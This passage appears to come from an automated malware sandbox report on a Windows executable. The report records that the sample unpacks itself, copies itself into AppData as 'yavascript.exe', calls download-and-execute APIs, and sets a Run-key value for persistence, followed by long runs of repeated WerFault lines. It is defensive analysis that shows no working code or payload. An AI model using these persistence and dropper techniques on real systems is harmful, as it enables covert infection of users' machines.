Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Section loaded: wininet.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Section loaded: winmm.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll

Data Obfuscation

Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Unpacked PE file: 0.2.yPIOW6yoPi.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Unpacked PE file: 17.2.yavascript.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Unpacked PE file: 20.2.yavascript.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Unpacked PE file: 38.2.yavascript.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Code function: 0_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress | 0_2_0041BCE3
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Code function: 0_2_004567E0 push eax; ret | 0_2_004567FE
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Code function: 0_2_0045B9DD push esi; ret | 0_2_0045B9E6
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Code function: 0_2_00455EAF push ecx; ret | 0_2_00455EC2
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Code function: 0_2_00433FF6 push ecx; ret | 0_2_00434009
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Code function: 0_2_00535B6A pushfd; ret | 0_2_00535B6B
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Code function: 0_2_00532CF5 push es; ret | 0_2_00532D02
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Code function: 0_2_020F724F push edx; retf | 0_2_020F7252
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Code function: 0_2_0212425D push ecx; ret | 0_2_02124270
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Code function: 0_2_0211409D push esi; ret | 0_2_0211409F
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Code function: 0_2_02146116 push ecx; ret | 0_2_02146129
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Code function: 0_2_02146A47 push eax; ret | 0_2_02146A65
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Code function: 0_2_02105EC9 push edi; ret | 0_2_02105ECA
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Code function: 0_2_02105C73 push esp; ret | 0_2_02105C74
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: 17_2_004567E0 push eax; ret | 17_2_004567FE
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: 17_2_0045B9DD push esi; ret | 17_2_0045B9E6
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: 17_2_00455EAF push ecx; ret | 17_2_00455EC2
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: 17_2_00433FF6 push ecx; ret | 17_2_00434009
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: 17_2_005F5B6A pushfd; ret | 17_2_005F5B6B
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: 17_2_005F2CF5 push es; ret | 17_2_005F2D02
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: 17_2_0077409D push esi; ret | 17_2_0077409F
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: 17_2_007A6116 push ecx; ret | 17_2_007A6129
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: 17_2_0078425D push ecx; ret | 17_2_00784270
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: 17_2_0075724F push edx; retf | 17_2_00757252
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: 17_2_007A6A47 push eax; ret | 17_2_007A6A65
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: 17_2_00765C73 push esp; ret | 17_2_00765C74
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: 17_2_00765EC9 push edi; ret | 17_2_00765ECA
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: 20_2_004567E0 push eax; ret | 20_2_004567FE
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: 20_2_0045B9DD push esi; ret | 20_2_0045B9E6
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: 20_2_00455EAF push ecx; ret | 20_2_00455EC2
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: 20_2_00433FF6 push ecx; ret | 20_2_00434009
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe | Code function: 20_2_00605B6A pushfd; ret | 20_2_00605B6B
Source: yPIOW6yoPi.exe | Static PE information: section name: .text entropy: 7.875500118800945
Source: yavascript.exe.0.dr | Static PE information: section name: .text entropy: 7.875500118800945
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | Code function: 0_2_00406128 ShellExecuteW,URLDownloadToFileW | 0_2_00406128
Source: C:\Users\user\Desktop\yPIOW6yoPi.exe | File created: C:\Users\user\AppData\Roaming\xenor\yavascript.exe

            Boot Survival

            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Rmc-I7G983
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe Code function: 0_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,0_2_00419BC4
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe Code function: 0_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,0_2_0041BCE3
            Source: C:\Users\user\Desktop\yPIOW6yoPi.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
